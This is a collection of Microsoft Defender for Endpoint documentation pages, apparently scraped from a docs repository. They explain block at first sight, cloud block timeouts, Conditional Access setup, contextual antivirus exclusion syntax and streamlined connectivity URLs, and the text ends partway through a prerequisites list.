--- Block at first sight can block non-portable executable files (such as JS, VBS, or macros) and executable files, running the [latest Defender antimalware platform](microsoft-defender-antivirus-updates.md) on Windows or Windows Server.--- Block at first sight only uses the cloud protection backend for executable files and non-portable executable files that are downloaded from the Internet, or that originate from the Internet zone. A hash value of the `.exe` file is checked via the cloud backend to determine if the file is a previously undetected file.--- If the cloud backend is unable to make a determination, Microsoft Defender Antivirus locks the file and uploads a copy to the cloud. The cloud performs more analysis to reach a determination before it either allows the file to run or blocks it in all future encounters, depending on whether it determines the file to be malicious or not a threat.--- In many cases, this process can reduce the response time for new malware from hours to seconds.--- You can [specify how long a file should be prevented from running](configure-cloud-block-timeout-period-microsoft-defender-antivirus.md) while the cloud-based protection service analyzes the file. And, you can [customize the message displayed on users' desktops](/windows/security/threat-protection/windows-defender-security-center/wdsc-customize-contact-information) when a file is blocked. You can change the company name, contact information, and message URL.-
-## Turn on block at first sight with Microsoft Intune
-
-1. In the Microsoft Intune admin center (<https://endpoint.microsoft.com>), go to **Endpoint security** \> **Antivirus**.
-
-2. Select an existing policy, or create a new policy using the **Microsoft Defender Antivirus** profile type. In our example, we selected **Windows 10, Windows 11, or Windows Server** for the platform.
-
- :::image type="content" source="mediav-policy.png":::
-
-3. Set **Allow cloud protection** to **Allowed. Turns on Cloud Protection**.
-
- :::image type="content" source="mediav-cpallowed.png" alt-text="Screenshot of Cloud Protection set to allowed in Intune.":::
-
-4. Scroll down to **Submit Samples Consent**, and select one of the following settings:
-
- - **Send all samples automatically**
- - **Send safe samples automatically**
-
-5. Apply the Microsoft Defender Antivirus profile to a group, such as **All users**, **All devices**, or **All users and devices**.
-
-## Turn on block at first sight with Group Policy
-
-> [!NOTE]
-> We recommend using Intune or Microsoft Configuration Manager to turn on block at first sight.
-
-1. On your Group Policy management computer, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)), right-click the Group Policy Object you want to configure and select **Edit**.
-
-2. Using the **Group Policy Management Editor** go to **Computer configuration** \> **Administrative templates** \> **Windows Components** \> **Microsoft Defender Antivirus** \> **MAPS**.
-
-3. In the MAPS section, double-click **Configure the 'Block at First Sight' feature**, and set it to **Enabled**, and then select **OK**.
-
- > [!IMPORTANT]
- > Setting to **Always prompt (0)** will lower the protection state of the device. Setting to **Never send (2)** means block at first sight will not function.
-
-4. In the MAPS section, double-click **Send file samples when further analysis is required**, and set it to **Enabled**. Under **Send file samples when further analysis is required**, select **Send all samples**, and then select **OK**.
-
-5. Redeploy your Group Policy Object across your network as you usually do.
-
-## Confirm block at first sight is enabled on individual client devices
-
-You can confirm that block at first sight is enabled on individual client devices using the Windows Security app. Block at first sight is automatically enabled as long as **Cloud-delivered protection** and **Automatic sample submission** are both turned on.
-
-1. Open the Windows Security app.
-
-2. Select **Virus & threat protection**, and then, under **Virus & threat protection settings**, select **Manage Settings**.
-
- :::image type="content" source="../../media/wdav-protection-settings-wdsc.png" alt-text="The Virus & threat protection settings label in the Windows Security app" lightbox="../../media/wdav-protection-settings-wdsc.png":::
-
-3. Confirm that **Cloud-delivered protection** and **Automatic sample submission** are both turned on.
-
-> [!NOTE]
->
-> - If the prerequisite settings are configured and deployed using Group Policy, the settings described in this section will be greyed-out and unavailable for use on individual endpoints.
-> - Changes made through a Group Policy Object must first be deployed to individual endpoints before the setting will be updated in Windows Settings.
-
-## Turn off block at first sight
-
-> [!CAUTION]
-> Turning off block at first sight will lower the protection state of your device(s) and your network. We do not recommend disabling block at first sight protection permanently.
-
-### Turn off block at first sight with Microsoft Intune
-
-1. Go to the Microsoft Intune admin center (<https://endpoint.microsoft.com>) and sign in.
-
-2. Go to **Endpoint security** \> **Antivirus**, and then select your Microsoft Defender Antivirus policy.
-
-3. Under **Manage**, choose **Properties**.
-
-4. Next to **Configuration settings**, choose **Edit**.
-
-5. Set **Allow cloud protection** to **Not allowed. Turns off Cloud Protection**.
-
-6. Review and save your settings.
-
-### Turn off block at first sight with Group Policy
-
-1. On your Group Policy management computer, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)), right-click the Group Policy Object you want to configure, and then select **Edit**.
-
-2. Using the **Group Policy Management Editor** go to **Computer configuration** and select **Administrative templates**.
-
-3. Expand the tree through **Windows components** \> **Microsoft Defender Antivirus** \> **MAPS**.
-
-4. Double-click **Configure the 'Block at First Sight' feature** and set the option to **Disabled**.
-
- > [!NOTE]
- > Disabling block at first sight does not disable or alter the prerequisite group policies.
-
-## Not an enterprise admin or IT Pro?
-
-If you are not an enterprise admin or an IT Pro, but you have questions about block at first sight, this section is for you. Block at first sight is a threat protection feature that detects and blocks malware within seconds. Although there isn't a specific setting called "Block at first sight," the feature is enabled when certain settings are configured on your device.
-
-### How to manage block at first sight on or off on your own device
-
-If you have a personal device that is not managed by an organization, you might be wondering how to turn block at first sight on or off. You can use the Windows Security app to manage block at first sight.
-
-1. On your Windows 10 or Windows 11 computer, open the Windows Security app.
-
-2. Select **Virus & threat protection**.
-
-3. Under **Virus & threat protection settings**, select **Manage settings**.
-
-4. Take one of the following steps:
-
- - To enable block at first sight, make sure that both **Cloud-delivered protection** and **Automatic sample submission** are both turned on.
-
- - To disable block at first sight, turn off **Cloud-delivered protection** or **Automatic sample submission**.
-
- > [!CAUTION]
- > Turning off block at first sight lowers the level of protection for your device. We do not recommend permanently disabling block at first sight.
-
-## See also
--- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)-- [Enable cloud-delivered protection](enable-cloud-protection-microsoft-defender-antivirus.md)-- [Stay protected with Windows Security](https://support.microsoft.com/windows/stay-protected-with-windows-security-2ae0363d-0ada-c064-8b56-6a39afb6a963)-- [Onboard non-Windows devices](configure-endpoints-non-windows.md)
security Configure Cloud Block Timeout Period Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-cloud-block-timeout-period-microsoft-defender-antivirus.md
- Title: Configure the Microsoft Defender Antivirus cloud block timeout period
-description: You can configure how long Microsoft Defender Antivirus will block a file from running while waiting for a cloud determination.
-------- Previously updated : 02/18/2024--- m365-security-- tier2-- mde-ngp--
-# Configure the cloud block timeout period
-
-**Applies to:**
-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-- Windows Server-
-When Microsoft Defender Antivirus finds a suspicious file, it can prevent the file from running while it queries the [Microsoft Defender Antivirus cloud service](cloud-protection-microsoft-defender-antivirus.md).
-
-The default period that the file is [blocked](configure-block-at-first-sight-microsoft-defender-antivirus.md) is 10 seconds. If you're a security administrator, you can specify more time to wait before the file is allowed to run. Extending the cloud block timeout period can help ensure there is enough time to receive a proper determination from the Microsoft Defender Antivirus cloud service.
-
-## Prerequisites to use the extended cloud block timeout
-
-[Block at first sight](configure-block-at-first-sight-microsoft-defender-antivirus.md) and its prerequisites must be enabled before you can specify an extended timeout period.
-
-## Specify the extended timeout period using Microsoft Defender for Endpoint Security settings management
-
-To specify the cloud block timeout period with Microsoft Defender for Endpoint Security settings management:
-
-1. Go to the Microsoft Defender for Endpoint portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-2. Select **Endpoints** > **Configuration management** > **Endpoint security policies**.
-3. Select **Create new Policy**.
-4. Under **Select Platform** choose: "Windows 10, Windows 11, and Windows Server".
-5. Under **Select Template** choose: "Microsoft Defender Antivirus".
-6. Select **Create policy**.
-7. Enter a name and description and select **Next**.
-8. From the **Defender** dropdown go to **Cloud Extended Timeout** and toggle it on.
-9. Specify the extended time, in seconds, from 1 second to 50 seconds. Whatever you specify is added to the default 10 seconds.
-10. Select **Next** and **Save** to finish configuring your policy.
-
-## Specify the extended timeout period using Microsoft Intune
-
-You can specify the cloud block timeout period with an [endpoint security policy in Microsoft Intune](/mem/intune/protect/endpoint-security-policy).
-
-1. Go to the Intune admin center ([https://endpoint.microsoft.com/](https://endpoint.microsoft.com/)) and sign in.
-
-2. Select **Endpoint security**, and then under **Manage**, choose **Antivirus**.
-
-3. Select (or create) an antivirus policy.
-
-4. In the **Configuration settings** section, expand **Cloud protection**. Then, in the **Microsoft Defender Antivirus Extended Timeout In Seconds** box, specify the more time, in seconds, from 1 second to 50 seconds. Whatever you specify is added to the default 10 seconds.
-
-5. (This step is optional) Make any other changes to your antivirus policy. (Need help? See [Settings for Microsoft Defender Antivirus policy in Microsoft Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-windows).)
-
-6. Choose **Next**, and finish configuring your policy.
-
-## Specify the extended timeout period using Group Policy
-
-You can use Group Policy to specify an extended timeout for cloud checks.
-
-1. On your Group Policy management computer, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11))
-
-2. Right-click the Group Policy Object you want to configure and then select **Edit**.
-
-3. In the **Group Policy Management Editor**, go to **Computer configuration**, and then select **Administrative templates**.
-
-3. Expand the tree to **Windows components** \> **Microsoft Defender Antivirus** \> **MpEngine**.
-
-4. Double-click **Configure extended cloud check** and ensure the option is enabled.
-
- Specify the extra amount of time to prevent the file from running while waiting for a cloud determination. Specify the extra time, in seconds, from 1 second to 50 seconds. Whatever you specify is added to the default 10 seconds.
-
-5. Select **OK**.
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Configure Conditional Access https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-conditional-access.md
- Title: Configure Conditional Access in Microsoft Defender for Endpoint
-description: Learn about steps that you need to do in Intune, Microsoft Defender XDR, and Azure to implement Conditional access
------- m365-security-- tier2- Previously updated : 10/25/2023--
-# Configure Conditional Access in Microsoft Defender for Endpoint
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-assignaccess-abovefoldlink)
-
-This section guides you through all the steps you need to take to properly implement Conditional Access.
-
-## Before you begin
-
-> [!WARNING]
-> It's important to note that Microsoft Entra registered devices is not supported in this scenario.</br>
-> Only Intune enrolled devices are supported.
-
-You need to make sure that all your devices are enrolled in Intune. You can use any of the following options to enroll devices in Intune:
--- IT Admin: For more information on how to enable auto-enrollment, see [Windows Enrollment](/intune/windows-enroll#enable-windows-10-automatic-enrollment)-- End-user: For more information on how to enroll your Windows 10 and Windows 11 device in Intune, see [Enroll your Windows 10 device in Intune](/intune/quickstart-enroll-windows-device)-- End-user alternative: For more information on joining a Microsoft Entra domain, see [How to: Plan your Microsoft Entra join implementation](/azure/active-directory/devices/azureadjoin-plan).-
-There are steps you'll need to take in Microsoft Defender XDR, the Intune portal, and Microsoft Entra admin center.
-
-It's important to note the required roles to access these portals and implement Conditional access:
--- **Microsoft Defender XDR** - You'll need to sign into the portal with a global administrator role to turn on the integration.-- **Intune** - You'll need to sign in to the portal with security administrator rights with management permissions.-- **Microsoft Entra admin center** - You'll need to sign in as a global administrator, security administrator, or Conditional Access administrator.-
-> [!NOTE]
-> You'll need a Microsoft Intune environment, with Intune managed and Microsoft Entra joined Windows 10 and Windows 11 devices.
-
-Take the following steps to enable Conditional Access:
--- Step 1: Turn on the Microsoft Intune connection from Microsoft Defender XDR-- Step 2: Turn on the Defender for Endpoint integration in Intune-- Step 3: Create the compliance policy in Intune-- Step 4: Assign the policy -- Step 5: Create a Microsoft Entra Conditional Access policy-
-### Step 1: Turn on the Microsoft Intune connection
-
-1. In the navigation pane, select **Settings** \> **Endpoints** \> **General** \> **Advanced features** \> **Microsoft Intune connection**.
-2. Toggle the Microsoft Intune setting to **On**.
-3. Click **Save preferences**.
-
-### Step 2: Turn on the Defender for Endpoint integration in Intune
-
-1. Sign in to the [Intune portal](https://intune.microsoft.com)
-2. Select **Endpoint Security** \> **Microsoft Defender for Endpoint**.
-3. Set **Connect Windows 10.0.15063+ devices to Microsoft Defender Advanced Threat Protection** to **On**.
-4. Click **Save**.
-
-### Step 3: Create the compliance policy in Intune
-
-1. In the [Azure portal](https://portal.azure.com), select **All services**, filter on **Intune**, and select **Microsoft Intune**.
-2. Select **Device compliance** \> **Policies** \> **Create policy**.
-3. Enter a **Name** and **Description**.
-4. In **Platform**, select **Windows 10 and later**.
-5. In the **Device Health** settings, set **Require the device to be at or under the Device Threat Level** to your preferred level:
-
- - **Secured**: This level is the most secure. The device cannot have any existing threats and still access company resources. If any threats are found, the device is evaluated as noncompliant.
- - **Low**: The device is compliant if only low-level threats exist. Devices with medium or high threat levels are not compliant.
- - **Medium**: The device is compliant if the threats found on the device are low or medium. If high-level threats are detected, the device is determined as noncompliant.
- - **High**: This level is the least secure, and allows all threat levels. So devices that with high, medium or low threat levels are considered compliant.
-
-6. Select **OK**, and **Create** to save your changes (and create the policy).
-
-### Step 4: Assign the policy
-
-1. In the [Azure portal](https://portal.azure.com), select **All services**, filter on **Intune**, and select **Microsoft Intune**.
-2. Select **Device compliance** \> **Policies**> select your Microsoft Defender for Endpoint compliance policy.
-3. Select **Assignments**.
-4. Include or exclude your Microsoft Entra groups to assign them the policy.
-5. To deploy the policy to the groups, select **Save**. The user devices targeted by the policy are evaluated for compliance.
-
-<a name='step-5-create-an-azure-ad-conditional-access-policy'></a>
-
-### Step 5: Create a Microsoft Entra Conditional Access policy
-
-1. In the [Azure portal](https://portal.azure.com), open **Microsoft Entra ID** \> **Conditional Access** \> **New policy**.
-2. Enter a policy **Name**, and select **Users and groups**. Use the Include or Exclude options to add your groups for the policy, and select **Done**.
-3. Select **Cloud apps**, and choose which apps to protect. For example, choose **Select apps**, and select **Office 365 SharePoint Online** and **Office 365 Exchange Online**. Select **Done** to save your changes.
-
-4. Select **Conditions** \> **Client apps** to apply the policy to apps and browsers. For example, select **Yes**, and then enable **Browser** and **Mobile apps and desktop clients**. Select **Done** to save your changes.
-
-5. Select **Grant** to apply Conditional Access based on device compliance. For example, select **Grant access** \> **Require device to be marked as compliant**. Choose **Select** to save your changes.
-
-6. Select **Enable policy**, and then **Create** to save your changes.
-
-> [!NOTE]
-> You can use the Microsoft Defender for Endpoint app along with the **Approved Client app** , **App Protection policy** and **Compliant Device** (Require device to be marked as compliant) controls in Microsoft Entra Conditional Access policies. There's no exclusion required for the Microsoft Defender for Endpoint app while setting up Conditional Access. Although Microsoft Defender for Endpoint on Android & iOS (App ID - dd47d17a-3194-4d86-bfd5-c6ae6f5651e3) isn't an approved app, it is able to report device security posture in all the three grant permissions.
->
-> However, internally Defender requests **MSGraph/User.read** scope and **Intune Tunnel** scope (in case of Defender+Tunnel scenarios). So these scopes must be excluded*. To exclude MSGraph/User.read scope, any one cloud app can be excluded. To exclude Tunnel scope, you need to exclude 'Microsoft Tunnel Gateway'.These permission and exclusions enables the flow for compliance information to Conditional Access.
-
-*Please note that applying a Conditional Access policy to All Cloud Apps could inadvertently block user access in some cases, so it's not recommended. Read more about [Conditional Access policies on Cloud Apps](/azure/active-directory/conditional-access/concept-conditional-access-cloud-apps#all-cloud-apps)
-
-For more information, see [Enforce compliance for Microsoft Defender for Endpoint with Conditional Access in Intune](/intune/advanced-threat-protection).
-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-conditionalaccess-belowfoldlink)
security Configure Contextual File Folder Exclusions Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-contextual-file-folder-exclusions-microsoft-defender-antivirus.md
- Title: Contextual file and folder exclusions
-description: Describes the contextual file and folder exclusions capability for Microsoft Defender Antivirus on Windows. This capability allows you to be more specific when you define under which context Microsoft Defender Antivirus shouldn't scan a file or folder, by applying restrictions
--- Previously updated : 02/18/2024---- m365-security-- tier2-- mde-ngp----
-# Contextual file and folder exclusions
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)--- Microsoft Defender for Business--- Microsoft Defender Antivirus--- Microsoft Defender for individuals-
-This article/section describes the contextual file and folder exclusions capability for Microsoft Defender Antivirus on Windows. This capability allows you to be more specific when you define under which context Microsoft Defender Antivirus shouldn't scan a file or folder, by applying restrictions.
-
-## Overview
-
-Exclusions are primarily intended to mitigate affects on performance. They come at the penalty of reduced protection value. These restrictions allow you to limit this protection reduction by specifying circumstances under which the exclusion should apply. Contextual exclusions aren't suitable for addressing false positives in a reliable way. If you encounter a false positive, you can submit files for analysis through the [Microsoft Defender XDR](https://security.microsoft.com/) portal (subscription required) or through the [Microsoft Security Intelligence](https://www.microsoft.com/wdsi/filesubmission) website. For a temporary suppression method, consider creating a custom _allow_ indicator in [Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/indicator-file).
-
-There are four restrictions you can apply to limit the applicability of an exclusion:
--- **File/folder path type restriction**. You can restrict exclusions to only apply if the target is a file, or a folder by making the intent specific. If the target is a file but the exclusion is specified to be a folder, it will not apply. Conversely, if the target is folder but the exclusion is specified to be a file, the exclusion will apply.-- **Scan type restriction**. Enables you to define the required scan type for an exclusion to apply. For example, you only want to exclude a certain folder from Full scans but not from a "resource" scan (targeted scan).-- **Scan trigger type restriction**. You can use this restriction to specify that the exclusion should only apply when the scan was initiated by a specific event:
- - on demand
- - on access
- - or originating from behavioral monitoring
-- **Process restriction**. Enables you to define that an exclusion should only apply when a file or folder is being accessed by a specific process.-
-## Configuring restrictions
-
-Restrictions are typically applied by adding the restriction type to the file or folder exclusion path.
-
-| Restriction | TypeName | value |
-|:|:|:|
-| File/folder | PathType | file <br> folder |
-| Scan type | ScanType | quick <br> full |
-| Scan trigger | ScanTrigger | OnDemand <br> OnAccess <br> BM |
-| Process | Process | "<image_path>" |
-
-### Requirements
-
-This capability requires Microsoft Defender Antivirus:
--- Platform: **4.18.2205.7** or later-- Engine: **1.1.19300.2** or later-
-### Syntax
-
-As a starting point, you may already have exclusions in place that you wish to make more specific. To form the exclusion string, first define the path to the file or folder to be excluded, then add the type name and associated value, as shown in the following example.
-
-`<PATH>\:{TypeName:value,TypeName:value}`
-
-Keep in mind that _all_ **types** and **values** are case sensitive.
-
-> [!NOTE]
-> Conditions inside `{}` MUST be true for the restriction to match. For example, if you specify two scan triggers this cannot be true, and the exclusion will not apply. To specify two restrictions of the same type, create two separate exclusions.
--
-### Examples
-
-The following string excludes "c:\documents\design.doc" only if it's a file and only in on-access scans:
-
-`c:\documents\design.doc\:{PathType:file,ScanTrigger:OnAccess}`
-
-The following string excludes "c:\documents\design.doc" only if it's scanned (on-access) due to it being accessed by a process having the image name "winword.exe":
-
-`c:\documents\design.doc\:{Process:"winword.exe"}`
-
-File and folder paths may contain wildcards, as in the following example:
-
-`c:\*\*.doc\:{PathType:file,ScanTrigger:OnDemand}`
-
-The process image path may contain wildcards, as in the following example:
-
-`c:\documents\design.doc\:{Process:"C:\Program Files*\Microsoft Office\root\Office??\winword.exe"}`
-
-### File/folder restriction
-
-You can restrict exclusions to only apply if the target is a file or a folder by making the intent specific. If the target is a file but the exclusion is specified to be a folder, the exclusion won't apply. Conversely, if the target is folder but the exclusion is specified to be a file, the exclusion will apply.
-
-#### File/folder exclusions default behavior
-
-If you don't specify any other options, the file/folder is excluded from all types of scans, _and_ the exclusion applies regardless of whether the target is a file or a folder. For more information about customizing exclusions to only apply to a specific scan type, see [Scan type restriction](#scan-type-restriction).
-
-> [!NOTE]
-> Wildcards are supported in file/folder exclusions.
-
-#### Folders
-
-To ensure an exclusion only applies if the target is a folder, not a file you can use the **PathType:folder** restriction. For example:
-
-`C:\documents\*\:{PathType:folder}`
-
-#### Files
-
-To make sure an exclusion only applies if the target is a file, not a folder you can use the PathType: file restriction.
-
-Example:
-
-`C:\documents\*.mdb\:{PathType:file}`
-
-### Scan type restriction
-
-By default, exclusions apply to all scan types:
--- **resource**: a single file or folder is scanned in a targeted way (for example, right-click, Scan)-- **quick**: common startup locations utilized by malware, memory and certain registry keys-- **full**: includes quick scan locations and complete file system (all files and folders)-
-To mitigate performance issues, you can exclude a folder or a set of files from being scanned by a specific scan type. You can also define the required scan type for an exclusion to apply.
-
-To exclude a folder from being scanned only during a full scan, specify a restriction type together with the file or folder exclusion, as in the following example:
-
-`C:\documents\:{ScanType:full}`
-
-To exclude a folder from being scanned only during a quick scan, specify a restriction type together with the file or folder exclusion:
-
-`C:\program.exe\:{ScanType:quick}`
-
-If you want to make sure this exclusion only applies to a specific file and not a folder (c:\foo.exe could be a folder), also apply the PathType restriction:
-
-`C:\program.exe\:{ScanType:quick,PathType:file}`
-
-### Scan trigger restriction
-
-By default, basic exclusions apply to all scan triggers. ScanTrigger restriction enables you to specify that the exclusion should only apply when the scan was initiated by a specific event; on demand (including quick, full and targeted scans), on access or originating from behavioral monitoring (including memory scans).
--- **OnDemand**: a scan was triggered by a command or admin action. Remember that scheduled quick and full scans also fall under this category.-- **OnAccess**: a file or folder is opened/written/read/modified (typically considered real-time protection)-- **BM**: a behavioral trigger causes the behavioral monitoring to scan a specific file-
-To exclude a file or folder and its contents from being scanned only when the file is being scanned after being accessed, define a scan trigger restriction such as the following example:
-
-`c:\documents\:{ScanTrigger:OnAccess}`
-
-### Process restriction
-
-This restriction allows you to define that an exclusion should only apply when a file or folder is being accessed by a specific process. A common scenario is when you want to avoid excluding the process as that avoidance would cause Defender Antivirus to ignore other operations by that process. Wildcards are supported in the process name/path.
-
-> [!NOTE]
->
-> Using a large amount of process exclusion restrictions on a machine can adversely affect performance. In addition, if an exclusion is restricted to a certain process or processes, other active processes (such as indexing, backup, updates) can still trigger file scans.
-
-To exclude a file or folder only when accessed by a specific process, create a normal file or folder exclusion and add the process to restrict the exclusion to. For example:
-
-`c:\documents\design.doc\:{Process:"winword.exe", Process:"msaccess.exe", Process:"C:\Program Files*\Microsoft Office\root\Office??\winword.exe"}`
-
-### How to configure
-
-After constructing your desired contextual exclusions, you can use your existing management tool to configure file and folder exclusions using the string you created.
-
-See: [Configure and validate exclusions for Microsoft Defender Antivirus scans](configure-exclusions-microsoft-defender-antivirus.md)
security Configure Device Connectivity https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-device-connectivity.md
- Title: Onboarding devices using streamlined connectivity for Microsoft Defender for Endpoint
-description: Learn how to use a streamlined domain or static IP ranges during onboarding when connecting devices to Microsoft Defender for Endpoint
--------- m365-security-- tier1- Previously updated : 03/07/2024--
-# Onboarding devices using streamlined connectivity for Microsoft Defender for Endpoint
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> [!NOTE]
->The streamlined onboarding method is currently in public preview. Make sure to review the prerequisites to confirm requirements and supported operating systems.
-
-The Microsoft Defender for Endpoint service may require the use of proxy configurations to report diagnostic data and communicate data to the service. Prior to the availability of the streamlined connectivity method, other URLs were required and Defender for Endpoint static IP ranges weren't supported. For more information on full MDE connectivity processes, see [STEP 1: Configure your network environment to ensure connectivity with Defender for Endpoint service](configure-environment.md).
-
-This article describes the streamlined device connectivity method and how to onboard new devices to use a simpler deployment and management of Defender for Endpoint cloud connectivity services. For more information on migrating previously onboarded devices, see [Migrating devices to streamlined connectivity](migrate-devices-streamlined.md).
-
-To simplify network configuration and management, you now have the option of onboarding devices to Defender for Endpoint using a reduced URL set or static IP ranges. See, [streamlined URL list](https://go.microsoft.com/fwlink/?linkid=2248278)
-
-The Defender for Endpoint-recognized simplified domain: `*.endpoint.security.microsoft.com` replaces the following core Defender for Endpoint
--- Cloud Protection/MAPS-- Malware Sample Submission Storage-- Auto-IR Sample Storage-- Defender for Endpoint Command & Control-- EDR Cyberdata-
-To support network devices without hostname resolution or wildcard support, you can alternatively configure connectivity using dedicated Defender for Endpoint static IP ranges. For more information, see [Configure connectivity using static IP ranges](#option-2-configure-connectivity-using-static-ip-ranges).
--
-> [!NOTE]
-> The simplified connectivity method will **not change how Microsoft Defender for Endpoint functions on a device nor will it change the end-user experience**. Only the URLs or IPs that a device uses to connect to the service will change.
-
-> [!IMPORTANT]
-> Preview limitations and known issues: <br/>
-> - Streamlined connectivity does not support onboarding through API (includes Microsoft Defender for Cloud and Intune).
-> - This onboarding method has specific prerequisites that do not apply to the standard onboarding method.
-
-## Consolidated services
-
-The following Defender for Endpoint URLs consolidated under the streamlined domain should no longer be required for connectivity if `*.endpoint.security.microsoft.com` is allowed and devices are onboarded using the streamlined onboarding package. You will need to maintain connectivity with other required services not consolidated that are relevant to your organization (for example, CRL, SmartScreen/Network Protection, and WNS).
--
-For the updated list of required URLs, see [Download the spreadsheet here](https://go.microsoft.com/fwlink/?linkid=2248278).
-
-> [!IMPORTANT]
-> If you are configuring using IP ranges, you will need to separately configure the EDR cyberdata service. This service is not consolidated on an IP level. See section below for more details.
-
-| Category | Consolidated URLs |
-|||
-| MAPS: cloud-delivered protection | `*.wdcp.microsoft.com` <br/>`*.wd.microsoft.com` |
-| Cloud protection & <br/>security intelligence updates for macOS and Linux | `unitedstates.x.cp.wd.microsoft.com` <br/>`europe.x.cp.wd.microsoft.com` <br/>`unitedkingdom.x.cp.wd.microsoft.com`<br/> `x.cp.wd.microsoft.com` <br/>`https://www.microsoft.com/security/encyclopedia/adlpackages.aspx` |
-| Malware Sample Submission Storage | `ussus1eastprod.blob.core.windows.net` <br/>`ussus2eastprod.blob.core.windows.net` <br/>`ussus3eastprod.blob.core.windows.net` <br/>`ussus4eastprod.blob.core.windows.net` <br/>`wsus1eastprod.blob.core.windows.net` <br/>`wsus2eastprod.blob.core.windows.net` <br/>`ussus1westprod.blob.core.windows.net` <br/>`ussus2westprod.blob.core.windows.net` <br/>`ussus3westprod.blob.core.windows.net` <br/>`ussus4westprod.blob.core.windows.net` <br/>`wsus1westprod.blob.core.windows.net`<br/>`wsus2westprod.blob.core.windows.net` <br/>`usseu1northprod.blob.core.windows.net` <br/>`wseu1northprod.blob.core.windows.net` <br/>`usseu1westprod.blob.core.windows.net` <br/>`wseu1westprod.blob.core.windows.net` <br/>`ussuk1southprod.blob.core.windows.net` <br/>`wsuk1southprod.blob.core.windows.net` <br/>`ussuk1westprod.blob.core.windows.net` <br/>`wsuk1westprod.blob.core.windows.net` |
-| Defender for Endpoint Auto-IR Sample Storage | `automatedirstrprdcus.blob.core.windows.net` <br/>`automatedirstrprdeus.blob.core.windows.net` <br/>`automatedirstrprdcus3.blob.core.windows.net` <br/>`automatedirstrprdeus3.blob.core.windows.net` <br/>`automatedirstrprdneu.blob.core.windows.net` <br/>`automatedirstrprdweu.blob.core.windows.net` <br/>`automatedirstrprdneu3.blob.core.windows.net` <br/>`automatedirstrprdweu3.blob.core.windows.net` <br/>`automatedirstrprduks.blob.core.windows.net` <br/>`automatedirstrprdukw.blob.core.windows.net` |
-| Defender for Endpoint Command and Control | `winatp-gw-cus.microsoft.com` <br/>`winatp-gw-eus.microsoft.com` <br/>`winatp-gw-cus3.microsoft.com` <br/>`winatp-gw-eus3.microsoft.com` <br/>`winatp-gw-neu.microsoft.com` <br/>`winatp-gw-weu.microsoft.com` <br/>`winatp-gw-neu3.microsoft.com` <br/>`winatp-gw-weu3.microsoft.com` <br/>`winatp-gw-uks.microsoft.com` <br/>`winatp-gw-ukw.microsoft.com` |
-| EDR Cyberdata | `events.data.microsoft.com` <br/>`us-v20.events.data.microsoft.com` <br/> `eu-v20.events.data.microsoft.com` <br/>`uk-v20.events.data.microsoft.com` |
--
-## Before you begin
-
-Devices must meet specific prerequisites to use the streamlined connectivity method for Defender for Endpoint. Ensure the prerequisites are met before proceeding with onboarding.
-
-### Prerequisites
-
-**License:**
--- Microsoft Defender for Endpoint Plan 1-- Microsoft Defender for Endpoint Plan 2-- Microsoft Defender for Business-- Microsoft Defender Vulnerability Management-
-**Minimum KB update (Windows)**
--- SENSE version: 10.8040.*/ March 8, 2022 or higher (see table)-
-**Microsoft Defender Antivirus versions (Windows)**
--- **Antimalware Client:** 4.18.2211.5 -- **Engine:** 1.1.19900.2 -- **Antivirus (Security Intelligence):** 1.391.345.0-
-**Defender Antivirus versions (macOS/Linux)**
